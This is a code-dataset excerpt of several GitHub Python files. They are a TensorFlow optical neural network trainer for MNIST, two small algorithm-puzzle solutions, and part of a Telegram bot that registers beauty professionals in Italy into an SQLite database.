idx2numpy.convert_from_file(self.test_labels_path) ## note\r\n # - these are the labels only! need to convert to 2D\r\n\r\n else:\r\n print(\"---- ERROR: currently not supporting input files type!! ----\")\r\n exit(FAILURE)\r\n\r\n assert self.epochs > 0, \"number of epochs should be > 0\"\r\n assert len(self.inputs.shape) >= 3\r\n shape_1d = (self.inputs.shape)[1]\r\n\r\n if (self.force_shape != None): # FIXME: currntly the force shape is the only way to give\r\n # the system the right shape\r\n shape_1d = self.force_shape\r\n\r\n if self.rescaling_f != None:\r\n shape_1d *= self.rescaling_f\r\n\r\n if self.padding_f != None:\r\n self.padz = math.floor(shape_1d*self.padding_f)\r\n shape_1d += self.padz\r\n assert len(self.inputs.shape) == 3, \"shape of input (4D?) is not yet supported\"\r\n self.padding = [[0,0], [self.padz, self.padz], [self.padz, self.padz]]\r\n\r\n self.shape = (shape_1d, shape_1d)\r\n print(\"---- model shape after processing is : {} ----\".format(self.shape))\r\n\r\n line = \"model : {}\\nshape : {}\\nlearning_rate : {}\\nZ :{}\\nlambda :{}\\n\" \\\r\n \"input prop : {}\\n# of layers_{}_phase_mode_{}_amp_mod_{}\".format(\r\n self.model_name,\r\n self.shape,\r\n self.lr,\r\n self.z,\r\n self.wavelen,\r\n self.prop_input,\r\n self.num_of_layers,\r\n self.phase_mod,\r\n self.amp_mod)\r\n # print(line)\r\n\r\n self.weight_path = \"model_{}_phase_modulate_{}_amp_modulate_{}_shape_{}_learning_rate_{}_Z_{}_lambda_{}_input prop{}_#_of_layers_{}\".format(self.model_name,\r\n self.phase_mod,\r\n self.amp_mod,\r\n self.shape,\r\n self.lr,\r\n self.z,\r\n self.wavelen,\r\n self.prop_input,\r\n self.num_of_layers)\r\n\r\n\r\n def buildModel(self):\r\n ## build layers ##\r\n print(\"**** Make sure you did: pip install -q pyyaml h5py ****\")\r\n for i in range(self.num_of_layers):\r\n layer = project_layers.ModularLayer(\"layer : {}\".format(i),\r\n self.z,\r\n self.shape,\r\n self.wavelen,\r\n self.nm,\r\n self.amp_mod,\r\n self.phase_mod)\r\n\r\n\r\n self.layers.append(layer)\r\n print(\"---- model has {} layers ----\".format(len(self.layers)))\r\n\r\n prop_layer = project_layers.PropLayer(\"prop_layer\", self.z, self.shape, self.wavelen,\r\n self.nm)\r\n\r\n output_layer = project_layers.output_layer\r\n\r\n model = tf.keras.models.Sequential()\r\n if self.prop_input:\r\n model.add(prop_layer)\r\n model.add(tf.keras.layers.Flatten())\r\n\r\n for i in range(self.num_of_layers):\r\n model.add(self.layers[i])\r\n model.add(tf.keras.layers.Flatten())\r\n\r\n model.add(output_layer)\r\n\r\n model.compile(\r\n tf.keras.optimizers.Adam(lr=self.lr, beta_1=0.9, beta_2=0.999, epsilon=1e-07),\r\n loss=tf.keras.losses.mse, metrics=['mae', 'mse']\r\n )\r\n # assert self.model == None, \"---- ERROR : model already exists! ----\"\r\n self.running_model = True\r\n self.model = model\r\n\r\n\r\n def trainModel(self,\r\n local_training_set = True,\r\n tf_dataset_name = None):\r\n\r\n print(\"**** Training Model ****\")\r\n model = self.model\r\n\r\n if (local_training_set == False):\r\n\r\n assert tf_dataset_name != None, \"please give a tf_dataset name as an argument\"\r\n\r\n ds, info = tfds.load(tf_dataset_name, split='train', shuffle_files=True, with_info=True)\r\n print(\"**** Model Info ****\")\r\n print(info)\r\n num_of_examples = int (info.splits[\"train\"].num_examples)\r\n for_loops_num = num_of_examples//self.batch_size\r\n\r\n for epoch in self.epochs:\r\n print(\"Start Epoch num {}\".format(epoch))\r\n\r\n ds = ds.shuffle(num_of_examples).batch(self.batch_size).prefetch(tf.data.experimental.AUTOTUNE)\r\n for i in (range(for_loops_num)):\r\n\r\n if (i % 100 == 0):\r\n print(\"train number : {}\".format(i))\r\n\r\n for example in ds.take(1):\r\n # covert inputs to grey scale and targets labels to 2D labels\r\n input_batch, target_batch = project_utils.make_inputs_targets_batch(example)\r\n\r\n if ((i % (for_loops_num // 10)) == 0):\r\n print(\"step #{} out of {}\".format(i, for_loops_num))\r\n\r\n\r\n print(\"fitting input\")\r\n if self.rescaling_f > 0:\r\n input_batch = project_utils.rescale_batch(input_batch,\r\n input_batch.shape[1]*\r\n self.rescaling_f)\r\n\r\n if self.padding_f > 0:\r\n input_batch = tf.pad(input_batch, self.padding)\r\n\r\n print(\"fitting target\")\r\n if (target_batch.shape != input_batch.shape):\r\n target_batch = project_utils.rescale_batch(target_batch, input_batch.shape[1])\r\n\r\n assert (target_batch.shape == input_batch.shape), \"---- input batch shape != \" \\\r\n \"targets \" \\\r\n \"shape! ----\"\r\n # print(\"input batch shape: {}, target shape: {}\".format(input_batch.shape,\r\n # target_batch.shape))\r\n\r\n input_batch = tf.cast(input_batch, tf.complex128)\r\n\r\n ## note - reshaping targets like so only right for 3D targets !##\r\n target_batch = tf.reshape(target_batch,(self.batch_size,\r\n target_batch.shape[1]*target_batch.shape[2]))\r\n\r\n print(\"training\")\r\n model.fit(input_batch, target_batch, epochs=1, use_multiprocessing=True, verbose=0)\r\n\r\n else:\r\n new_inp_size = self.num_of_samples//self.batch_size\r\n for e in range(self.epochs):\r\n\r\n print(\"Epoch num #{} ot out {}\".format(e + 1, self.epochs))\r\n for i in range(new_inp_size):\r\n\r\n ## print what step were in\r\n if ((i % (new_inp_size // 10)) == 0):\r\n print(\"step #{} out of {}\".format(i, new_inp_size))\r\n\r\n ## process input/target batch ##\r\n input_batch = tf.cast(self.inputs[i:i + self.batch_size], tf.float32)\r\n target_batch = tf.cast(self.targets[i:i + self.batch_size], tf.float32)\r\n\r\n # target_batch = tf.reshape(target_batch,\r\n # (self.batch_size, self.shape[0], self.shape[1]))\r\n\r\n if self.rescaling_f > 0:\r\n input_batch = project_utils.rescale_batch(input_batch,\r\n input_batch.shape[1]*\r\n self.rescaling_f)\r\n\r\n if self.padding_f > 0:\r\n input_batch = tf.pad(input_batch, self.padding)\r\n\r\n if (target_batch.shape != input_batch.shape):\r\n target_batch = project_utils.rescale_batch(target_batch, input_batch.shape[1])\r\n\r\n assert (target_batch.shape == input_batch.shape), \"---- input batch shape != \" \\\r\n \"targets \" \\\r\n \"shape! ----\"\r\n\r\n input_batch = tf.cast(input_batch, tf.complex128)\r\n\r\n ## note - reshaping targets like so only right for 3D targets !##\r\n target_batch = tf.reshape(target_batch,(self.batch_size,\r\n target_batch.shape[1]*target_batch.shape[2]))\r\n\r\n model.fit(input_batch, target_batch, epochs=1, use_multiprocessing=True, verbose=0)\r\n\r\n\r\n ## after training finished\r\n print(model.summary())\r\n self.model = model\r\n\r\n ## TODO - fix saveing model!!!\r\n # model.save(self.dir_to_save + '/' + self.name_to_save)\r\n model.save(\"{}/{}\".format(self.dir_to_save,self.model_name))\r\n model.save_weights(\"{}/{}/\".format(self.dir_to_save, self.model_name))\r\n\r\n print(\"*** Finished training - saved weights @ {} ***\".format(self.dir_to_save +'/'+self.weights_name))\r\n\r\n\r\n def rebuildModel(self, dir_to_save, model_name, input_shape):\r\n \"\"\"\r\n This function gets a path for a JSON file, desribing a model, an rebuild it before\r\n testing the model\r\n :return:\r\n \"\"\"\r\n # TODO: for now input_shape must be forced via arguemt, next step is to save it with a\r\n # JSON representaion of the network in the same dir as the weights, then pre-load that\r\n # JSON file to get all the relevant data in ordder to load the weights propely\r\n try:\r\n custom_objects = {\"output_func\": project_layers.output_func,\r\n \"output_layer\": project_layers.output_layer,\r\n \"my_fft_prop\": project_prop.my_fft_prop,\r\n \"ModularLayer\": project_layers.ModularLayer}\r\n\r\n self.model = tf.keras.models.load_model(\"{}/{}/\".format(dir_to_save,model_name),\r\n custom_objects = custom_objects)\r\n print(\"**** Full model loaded ****\")\r\n except:\r\n self.model.build(input_shape = (None, ) + input_shape)\r\n self.model.load_weights(\"{}/{}/\".format(dir_to_save,model_name))\r\n print(\"**** Weights Loaded ****\")\r\n\r\n\r\n def testModel(self,\r\n test_low_idx,\r\n test_high_idx,\r\n num_of_samples_to_tests,\r\n numeric_targets,\r\n local_training_set,\r\n tf_dataset_name = None,\r\n inputs_test_set = None,\r\n monte_carlo = False,\r\n monte_carlo_variance = None,\r\n input_shift = False,\r\n input_shift_percentrage = None\r\n ):\r\n\r\n \"\"\"\r\n\r\n :param test_low_idx: min for random index\r\n :param test_high_idx: max for random index\r\n :param num_of_samples_to_tests: number of samples\r\n :param numeric_targets: path to the array with the labels as numeric values\r\n :param inputs_test_set: path to the 2D test set\r\n :return:\r\n \"\"\"\r\n if self.running_model == False:\r\n print(\"ERROR: cannot test model, 'running_model' if False\")\r\n exit(FAILURE)\r\n\r\n assert (self.model != None), \"Model cannot be None when testing!\"\r\n # get truth table\r\n TT = project_utils.Truth_table()\r\n TT.clear()\r\n\r\n # # assert (local_training_set == False and tf_dataset_name != None), \"If dataset is not \" \\\r\n # \"local, tf_dataset_name arg should be != None\"\r\n\r\n true_count = 0\r\n flase_count = 0\r\n\r\n\r\n # Deal with tf_datasets:\r\n if (tf_dataset_name != None and local_training_set == False):\r\n ds, info = tfds.load(tf_dataset_name, split='test', shuffle_files=True, with_info=True)\r\n num_of_samples = int (info.splits[\"test\"].num_examples)\r\n\r\n if monte_carlo == True:\r\n test_model = self.monteCarlo(monte_carlo_variance)\r\n else:\r\n test_model = self.model\r\n\r\n ds = ds.shuffle(num_of_samples).batch(1).prefetch(tf.data.experimental.AUTOTUNE)\r\n count = 0\r\n for i in range(num_of_samples_to_tests):\r\n\r\n for example in ds.take(1):\r\n input_batch, target_batch = project_utils.make_inputs_targets_batch(example)\r\n expected = example[\"label\"].numpy()[0]\r\n # print(expected)\r\n # print(example)\r\n # print(example[\"label\"].numpy)\r\n\r\n inp_shape = input_batch.shape\r\n if len(inp_shape) == 2:\r\n inp_shape = (1, inp_shape[0], inp_shape[1], 1)\r\n if len(inp_shape) == 3:\r\n inp_shape = (1, inp_shape[0], inp_shape[1], inp_shape[2])\r\n\r\n\r\n if self.rescaling_f > 0:\r\n input_batch = project_utils.rescale_batch(input_batch,\r\n input_batch.shape[1]*\r\n self.rescaling_f,\r\n input_shift,\r\n input_shift_percentrage)\r\n\r\n if self.padding_f > 0:\r\n input_batch = tf.pad(input_batch, self.padding)\r\n\r\n if (target_batch.shape != input_batch.shape):\r\n target_batch = project_utils.rescale_batch(target_batch, input_batch.shape[1])\r\n\r\n assert (target_batch.shape == input_batch.shape), \"---- input batch shape != \" \\\r\n \"targets \" \\\r\n \"shape! ----\"\r\n\r\n input_batch = tf.cast(input_batch, tf.complex128)\r\n\r\n ## note - reshaping targets like so only right for 3D targets !##\r\n # target_batch = tf.reshape(target_batch,(self.batch_size,\r\n # target_batch.shape[1]*target_batch.shape[2]))\r\n # if self.rescaling_f > 0:\r\n # inp = tf.image.resize_with_pad(tf.reshape(input_batch, inp_shape), self.shape[0],\r\n # self.shape[1])\r\n #\r\n # if self.padding_f > 0:\r\n # inp = tf.pad(inp, self.padding)\r\n #\r\n # target = tf.image.resize_with_pad(tf.reshape(target_batch, inp_shape), self.shape[0],\r\n # self.shape[1])\r\n #\r\n # inp = tf.reshape(inp, (1, self.shape[0], self.shape[1]))\r\n # target = tf.reshape(target, (self.shape[0], self.shape[1]))\r\n #\r\n # inp = tf.cast(inp, tf.complex128)\r\n # assign Monte Carlo model or the clean model\r\n\r\n y = test_model.predict(input_batch)\r\n\r\n WIDTH, HEIGHT = self.shape\r\n\r\n if (project_utils.compare_imgs(tf.reshape(target_batch, (WIDTH, HEIGHT)),\r\n tf.reshape(y, (WIDTH, HEIGHT)),\r\n 0.3) == True):\r\n # TT.add_true(numeric_targets[idx]) // TODO - uncomment and debug\r\n print(\"TRUE\")\r\n # plt.subplot(311)\r\n # plt.imshow(tf.abs(tf.reshape(input_batch, (WIDTH, HEIGHT))))\r\n # plt.subplot(312)\r\n # plt.imshow(tf.reshape(target_batch, (WIDTH, HEIGHT)))\r\n # plt.subplot(313)\r\n # project_utils.show_max_area(tf.reshape(y, (WIDTH, HEIGHT)))\r\n # project_utils.show_max_area((y.reshape(WIDTH, HEIGHT)))\r\n # plt.show()\r\n true_count+=1\r\n TT.add_true(expected)\r\n\r\n else:\r\n print(\"FALSE\")\r\n plt.subplot(311)\r\n plt.imshow(tf.abs(tf.reshape(input_batch, (WIDTH, HEIGHT))))\r\n plt.subplot(312)\r\n plt.imshow(tf.reshape(target_batch, (WIDTH, HEIGHT)))\r\n plt.subplot(313)\r\n project_utils.show_max_area(tf.reshape(y, (WIDTH, HEIGHT)))\r\n project_utils.show_max_area((y.reshape(WIDTH, HEIGHT)))\r\n plt.show()\r\n flase_count+=1\r\n actual_label = project_utils.result_to_label(project_utils.find_max_area(\r\n y.reshape(HEIGHT, WIDTH))[1], y.reshape(HEIGHT, WIDTH))\r\n\r\n print(\"expected label: {}, got label: {}\".format(expected, actual_label))\r\n TT.add_false(expected, actual_label)\r\n\r\n count += 1\r\n\r\n # print(\"# of True: \", TT.trues)\r\n # print(\"# of False: \", TT.falses)\r\n\r\n print(\"Total # of True: \", true_count)\r\n print(\"Total # of False: \", flase_count)\r\n TT.print_table(\"Mnist\", \"Got\", \"Expected\")\r\n\r\n else:\r\n #create a list of indexes for tests\r\n test_idx_list = np.random.randint(test_low_idx, test_high_idx, num_of_samples_to_tests)\r\n\r\n # assign Monte Carlo model or the clean model\r\n if monte_carlo == True:\r\n test_model = self.monteCarlo(monte_carlo_variance)\r\n else:\r\n test_model = self.model\r\n\r\n count = 1\r\n for idx in test_idx_list:\r\n print(\"running test #{} out of #{}, with idx = {}\".format(count,\r\n num_of_samples_to_tests, idx))\r\n\r\n # TODO - update this work with other inputs\r\n if (inputs_test_set != None):\r\n inp = self.tests_inputs[idx]\r\n assert (len(inp.shape) == 2)\r\n target = project_utils.make_2D_label(self.test_targets_labels[idx], inp.shape)\r\n expected = self.test_targets_labels[idx]\r\n\r\n else:\r\n inp = self.inputs[idx]\r\n target = self.targets[idx]\r\n\r\n # deal with rescaling\r\n if (input_shift):\r\n inp = project_utils.shift_pic_rand(inp, input_shift_percentrage, True)\r\n\r\n inp_shape = inp.shape\r\n if len(inp_shape) == 2:\r\n inp_shape = (1, inp_shape[0], inp_shape[1], 1)\r\n if len(inp_shape) == 3:\r\n inp_shape = (1, inp_shape[0], inp_shape[1], inp_shape[2])\r\n\r\n if self.rescaling_f > 0:\r\n inp = tf.image.resize_with_pad(tf.reshape(inp, inp_shape),self.shape[0],\r\n self.shape[1])\r\n\r\n if self.padding_f > 0:\r\n inp = tf.pad(inp, self.padding)\r\n\r\n\r\n target = tf.image.resize_with_pad(tf.reshape(target, inp_shape), self.shape[0],\r\n self.shape[1])\r\n\r\n inp = tf.reshape(inp, (1, self.shape[0], self.shape[1]))\r\n target = tf.reshape(target, (self.shape[0], self.shape[1]))\r\n\r\n inp = tf.cast(inp, tf.complex128)\r\n\r\n\r\n y = test_model.predict(inp)\r\n\r\n WIDTH, HEIGHT = self.shape\r\n\r\n if (project_utils.compare_imgs(tf.reshape(target, (WIDTH, HEIGHT)),\r\n tf.reshape(y, (WIDTH, HEIGHT)),\r\n 0.3) == True):\r\n # TT.add_true(numeric_targets[idx]) // TODO - uncomment and debug\r\n print(\"TRUE\")\r\n true_count += 1\r\n TT.add_true(expected)\r\n else:\r\n print(\"FALSE\")\r\n plt.subplot(311)\r\n plt.imshow(tf.abs(tf.reshape(inp, (WIDTH, HEIGHT))))\r\n plt.subplot(312)\r\n plt.imshow(tf.reshape(target, (WIDTH, HEIGHT)))\r\n plt.subplot(313)\r\n project_utils.show_max_area(tf.reshape(y, (WIDTH, HEIGHT)))\r\n project_utils.show_max_area((y.reshape(WIDTH, HEIGHT)))\r\n plt.show()\r\n flase_count += 1\r\n actual_label = project_utils.result_to_label(project_utils.find_max_area(\r\n y.reshape(HEIGHT, WIDTH))[1], y.reshape(HEIGHT, WIDTH))\r\n\r\n print(\"expected label: {}, got label: {}\".format(expected, actual_label))\r\n TT.add_false(expected, actual_label)\r\n\r\n count+=1\r\n\r\n # print(\"# of True: \", TT.trues)\r\n # print(\"# of False: \", TT.falses)\r\n\r\n print(\"Total # of True: \", TT.trues)\r\n print(\"Total # of False: \", TT.falses)\r\n TT.print_table(\"Mnist\", \"Got\", \"Expected\")\r\n\r\n\r\n\r\n def printHeader(self):\r\n print(header.format(self.model_name, self.num_of_layers, self.z,\r\n self.wavelen, self.nm))\r\n\r\n def monteCarlo(self, variance):\r\n\r\n assert (variance < 1), \"Variance should be < 1 (in %)\"\r\n\r\n assert (self.model != None), \"Model cannot be None!\"\r\n\r\n monte_carlo_model = self.model\r\n\r\n for i in range(len(monte_carlo_model.layers)):\r\n weights = monte_carlo_model.layers[i].get_weights()\r\n num_of_weights = len(weights)\r\n\r\n if (num_of_weights > 0):\r\n for w in range(num_of_weights):\r\n weights[w] *= (1 + np.random.uniform(0, variance, weights[w].shape))\r\n monte_carlo_model.layers[i].set_weights(weights)\r\n return monte_carlo_model","repo_name":"avshalomn/project_custom_models","sub_path":"project_model.py","file_name":"project_model.py","file_ext":"py","file_size_in_byte":26234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14793702732","text":"class Solution:\n def simplifyPath(self, path):\n \"\"\"\n :type path: str\n :rtype: str\n \"\"\"\n docs = [x for x in path.split('/') if x != '.' and x != '']\n res = []\n for i in docs:\n if i == '..':\n if res:\n res.pop()\n else:\n res.append(i)\n re = '/' + '/'.join(res)\n return re\n\nobj = Solution()\nprint(obj.simplifyPath(\"/a//b////c/d//././/..\"))","repo_name":"smileshy777/practice","sub_path":"string_/Simplify_Path.py","file_name":"Simplify_Path.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69959495593","text":"n = int(input())\r\nnum = list(map(int, input().split()))\r\n# 0 1 1 3 2 \r\n\r\n# 4 2 5 3 1\r\n\r\nlst = []\r\n\r\nfor i in range(n):\r\n lst.insert(num[i], i+1)\r\nprint(*list(reversed(lst)))","repo_name":"kanghaeven/Algorithm","sub_path":"백준/Bronze/2605. 줄 세우기/줄 세우기.py","file_name":"줄 세우기.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2549968490","text":"__author__ = 'ArkJzzz (arkjzzz@gmail.com)'\n\nimport os\nimport logging\nimport sqlite3\nimport textwrap\nimport phonenumbers\nimport traceback\nimport html\nimport json\n\nfrom dotenv import load_dotenv\nfrom telegram import ParseMode\nfrom telegram import Update\nfrom telegram.ext import Filters\nfrom telegram.ext import Updater\nfrom telegram.ext import CallbackContext\nfrom telegram.ext import CallbackQueryHandler\nfrom telegram.ext import CommandHandler\nfrom telegram.ext import MessageHandler\nfrom telegram.ext import PreCheckoutQueryHandler\n\n\n\nimport keyboards\nimport messages\nimport sqlite_helpers\n\nfrom pprint import pprint\n\n\nlogger = logging.getLogger('masters_bot')\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\ndef handle_users_reply(update, context):\n pprint(context.user_data)\n if update.message:\n chat_id = update.message.chat_id\n user_reply = update.message.text\n elif update.callback_query:\n chat_id = update.callback_query.message.chat_id\n user_reply = update.callback_query.data\n else:\n return\n\n context.user_data['telegram_id'] = chat_id\n\n if user_reply == '/start':\n master_state = 'START'\n else:\n master_state = sqlite_helpers.get_master_state(chat_id)\n\n logger.debug(f'user_reply: {user_reply}')\n logger.debug(f'master_state: {master_state}')\n \n states_functions = {\n 'START': start,\n 'MASTER_REGISTRATION': master_registration_handler,\n 'MASTER_NAME_WAITING': save_master_name,\n 'TG_USERNAME_WAITING': save_tg_username,\n 'EMAIL_WAITING': save_email,\n 'PHONE_WAITING': save_phone,\n 'SOCIAL_WAITING': save_social,\n 'SELECT_CATEGORIES': select_categories,\n 'SELECT_SPECIALIZATIONS': select_specializations,\n 'SELECT_IS_ONLINE': select_is_online,\n 'SELECT_REGION': select_region,\n 'SELECT_PROVINCES': select_provinces,\n 'CITIES_WAITING': save_cities,\n 'SELECT_IS_HOUSE_CALL': select_is_house_call,\n 'SELECT_IS_FIND_JOB': select_find_job,\n 'OTHER_INFO': other_info,\n 'SHOW_MASTER_PAGE': show_master_page,\n }\n\n state_handler = states_functions[master_state]\n next_state = state_handler(update, context)\n logger.debug('next_state: {}'.format(next_state))\n sqlite_helpers.set_master_state(chat_id, next_state)\n\n\ndef error_handler(update: object, context: CallbackContext):\n message = f'''\\\n Exception while handling an update:\n {context.error}\n '''\n logger.error(message, exc_info=context.error)\n tb_list = traceback.format_exception(None, context.error, context.error.__traceback__)\n tb_string = ''.join(tb_list)\n\n update_str = update.to_dict() if isinstance(update, Update) else str(update)\n message = (\n f'An exception was raised while handling an update\\n'\n f'
update = {html.escape(json.dumps(update_str, indent=2, ensure_ascii=False))}'\n        '
\\n\\n'\n f'
context.chat_data = {html.escape(str(context.chat_data))}
\\n\\n'\n f'
context.user_data = {html.escape(str(context.user_data))}
\\n\\n'\n f'
{html.escape(tb_string)}
'\n )\n\n context.bot.send_message(\n chat_id=os.getenv('ADMIN_CHAT_ID'), \n text=message,\n parse_mode=ParseMode.HTML,\n )\n\n\ndef send_confirmation_message(update, context):\n sent_message = update.message.reply_text(\n text=textwrap.dedent(f'Вы ввели \\n{update.message.text}'),\n reply_markup=keyboards.get_confirm_keyboard(),\n )\n if context.user_data.get('message_to_del_id'):\n context.bot.delete_message(\n chat_id=update.message.chat_id,\n message_id=context.user_data['message_to_del_id']\n )\n context.user_data['message_to_del_id'] = sent_message.message_id\n logger.debug(context.user_data)\n\n\ndef send_message(update, context, text, keyboard=None):\n if update.callback_query:\n message = update.callback_query.message\n else:\n message = update.message\n sent_message = message.reply_text(\n text=textwrap.dedent(text),\n reply_markup=keyboard,\n )\n if context.user_data.get('message_to_del_id'):\n context.bot.delete_message(\n chat_id=message.chat_id,\n message_id=context.user_data['message_to_del_id']\n )\n context.user_data['message_to_del_id'] = sent_message.message_id\n logger.debug(context.user_data)\n\n\ndef start(update, context):\n user = update.message.from_user\n\n context.user_data['category_id'] = ''\n context.user_data['e_mail'] = ''\n context.user_data['fullname'] = ''\n context.user_data['social'] = ''\n context.user_data['other_info'] = ''\n context.user_data['phone_number'] = ''\n context.user_data['region_id'] = ''\n context.user_data['telegram_id'] = user.id\n context.user_data['telegram_username'] = ''\n context.user_data['subscription_exp'] = '01.09.2023'\n context.user_data['current_page'] = 1\n context.user_data['selected_specializations'] = set()\n context.user_data['provinces'] = set()\n context.user_data['cities'] = ''\n context.user_data['is_house_call'] = False\n context.user_data['is_online'] = False\n context.user_data['is_find_job'] = False\n \n sqlite_helpers.set_user(user.id, user.username)\n logger.info(f'User @{user.username} started the conversation.')\n logger.debug(f'user.id: {user.id}')\n logger.debug(f'user.username: {user.username}')\n logger.debug(f'user.first_name: {user.first_name}')\n logger.debug(f'user.last_name: {user.last_name}')\n\n logger.debug(sqlite_helpers.get_master(user.id))\n\n if sqlite_helpers.get_master(user.id):\n update.message.reply_text(\n text='Мастер уже есть в базе данных',\n reply_markup=keyboards.get_show_master_page_keyboard()\n )\n # return 'SHOW_MASTER_PAGE'\n return 'PHONE_WAITING'\n else:\n sqlite_helpers.set_masters_telegram_id(user.id)\n welcome_message = f'''\\\n Здравствуйте, {user.first_name}.\n Это бот по управлению аккаунтом в базе русскоязычных бьюти-мастеров в Италии @krasotatut_italy_bot.\n Нажимая \"Продолжить\", Вы соглашаетесь с условиями использования.\n '''\n update.message.reply_text(\n text=textwrap.dedent(welcome_message),\n reply_markup=keyboards.get_edit_master_info_keyboard(),\n )\n return 'MASTER_REGISTRATION'\n\n\ndef master_registration_handler(update, context):\n query = update.callback_query\n query.message.reply_text(\n text=textwrap.dedent(messages.start_registration_text),\n )\n query.message.reply_text(\n text=textwrap.dedent(messages.save_master_name_text),\n )\n return 'MASTER_NAME_WAITING'\n\n\ndef save_master_name(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_fullname(\n context.user_data['fullname'],\n context.user_data['telegram_id'],\n )\n send_message(update, context, messages.step_two_text)\n return 'TG_USERNAME_WAITING'\n else:\n send_message(update, context, messages.save_master_name_text)\n else:\n user_reply = update.message.text\n context.user_data['fullname'] = user_reply\n send_confirmation_message(update, context)\n return 'MASTER_NAME_WAITING'\n\n\ndef save_tg_username(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_telegram_username(\n context.user_data['telegram_username'],\n context.user_data['telegram_id'],\n )\n send_message(update, context, messages.step_three_text)\n return 'EMAIL_WAITING'\n else:\n send_message(update, context, messages.step_two_text)\n else:\n context.user_data['telegram_username'] = update.message.text\n send_confirmation_message(update, context)\n return 'TG_USERNAME_WAITING'\n\n\ndef save_email(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_e_mail(\n context.user_data['e_mail'],\n context.user_data['telegram_id'],\n )\n send_message(update, context, messages.step_four_text)\n return 'PHONE_WAITING'\n else:\n send_message(update, context, messages.step_three_text)\n else:\n context.user_data['e_mail'] = update.message.text\n send_confirmation_message(update, context)\n return 'EMAIL_WAITING'\n\n\ndef save_phone(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_phone_number(\n context.user_data['phone_number'],\n context.user_data['telegram_id'],\n )\n send_message(update, context, messages.step_five_text)\n return 'SOCIAL_WAITING'\n else:\n send_message(update, context, messages.step_four_text)\n else:\n try:\n phone_number = phonenumbers.parse(update.message.text)\n if phonenumbers.is_possible_number(phone_number):\n logger.debug(f'+{phone_number.country_code}{phone_number.national_number} phone possible')\n phone_number = f'+{phone_number.country_code}{phone_number.national_number}'\n context.user_data['phone_number'] = phone_number\n send_confirmation_message(update, context)\n else:\n logger.debug('wrong phone')\n send_message(update, context, messages.invalid_phone_text)\n except phonenumbers.NumberParseException as e:\n logger.error(e)\n logger.debug('wrong phone')\n send_message(update, context, messages.invalid_phone_text)\n \n return 'PHONE_WAITING'\n\n\ndef save_social(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_social(\n context.user_data['social'],\n context.user_data['telegram_id'],\n )\n select_categories(update, context)\n return 'SELECT_CATEGORIES'\n else:\n send_message(update, context, messages.step_five_text)\n else:\n context.user_data['social'] = update.message.text\n send_confirmation_message(update, context)\n return 'SOCIAL_WAITING'\n\n\ndef select_categories(update, context):\n query = update.callback_query\n \n if 'SELECT_IS_ONLINE' in query.data:\n sqlite_helpers.update_masters_specializations(\n context.user_data['selected_specializations'],\n context.user_data['telegram_id'],\n )\n select_is_online(update, context)\n return 'SELECT_IS_ONLINE'\n \n elif 'SELECTED_CATEGORY' in query.data:\n pattern, category_id = query.data.split('|')\n category_id = int(category_id)\n context.user_data['category_id'] = category_id\n context.user_data['current_page'] = 1\n select_specializations(update, context)\n return 'SELECT_SPECIALIZATIONS'\n\n elif 'PAGE' in query.data:\n pattern, current_page = query.data.split('|')\n current_page = int(current_page)\n context.user_data['current_page'] = current_page\n \n categories_keyboard = keyboards.get_categories_keyboard(\n sqlite_helpers.get_categories(),\n context.user_data['current_page'],\n )\n send_message(\n update, \n context, \n messages.step_six_text,\n categories_keyboard,\n )\n return 'SELECT_CATEGORIES'\n\n\ndef select_specializations(update, context):\n query = update.callback_query\n pprint(context.user_data)\n logger.debug(f'query.data: {query.data}')\n\n if 'SELECT_CATEGORIES' in query.data:\n context.user_data['current_page'] = 1\n select_categories(update, context)\n return 'SELECT_CATEGORIES'\n\n elif 'SELECTED_SPECIALIZATION' in query.data:\n pattern, specialization_id = query.data.split('|')\n specialization_id = int(specialization_id)\n if specialization_id in context.user_data['selected_specializations']:\n context.user_data['selected_specializations'].discard(specialization_id)\n else:\n context.user_data['selected_specializations'].add(specialization_id)\n\n elif 'PAGE' in query.data:\n pattern, current_page = query.data.split('|')\n context.user_data['current_page'] = int(current_page)\n\n category_id = context.user_data['category_id']\n specializations_keyboard = keyboards.get_specializations_keyboard(\n sqlite_helpers.get_category_specializations(category_id), \n context.user_data['selected_specializations'], \n context.user_data['current_page'],\n )\n send_message(\n update, \n context, \n messages.step_seven_text,\n specializations_keyboard,\n )\n return 'SELECT_SPECIALIZATIONS'\n\n\ndef select_is_online(update, context):\n query = update.callback_query\n if 'SELECT_REGION' in query.data:\n sqlite_helpers.update_master_is_online(\n context.user_data['is_online'],\n context.user_data['telegram_id'],\n ) \n select_region(update, context)\n return 'SELECT_REGION'\n elif 'PUSH_IS_ONLINE' in query.data:\n if not context.user_data['is_online']:\n context.user_data['is_online'] = True\n else:\n context.user_data['is_online'] = False\n is_online_keyboard = keyboards.get_is_online_keyboard(\n context.user_data['is_online'],\n )\n send_message(\n update, \n context, \n messages.select_is_online_text,\n is_online_keyboard,\n )\n return 'SELECT_IS_ONLINE'\n\n\ndef select_region(update, context):\n query = update.callback_query\n \n if 'CITIES_WAITING' in query.data:\n sqlite_helpers.update_masters_provinces(\n context.user_data['provinces'],\n context.user_data['telegram_id'],\n )\n save_cities(update, context)\n return 'CITIES_WAITING'\n\n elif 'SELECTED_REGION' in query.data:\n pattern, region_id = query.data.split('|')\n region_id = int(region_id)\n context.user_data['region_id'] = region_id\n context.user_data['current_page'] = 1\n select_provinces(update, context)\n return 'SELECT_PROVINCES'\n\n elif 'PAGE' in query.data:\n pattern, current_page = query.data.split('|')\n context.user_data['current_page'] = int(current_page)\n \n regions_keyboard = keyboards.get_regions_keyboard(\n sqlite_helpers.get_regions(),\n context.user_data['current_page'],\n )\n send_message(\n update, \n context, \n messages.step_eight_text,\n regions_keyboard,\n )\n return 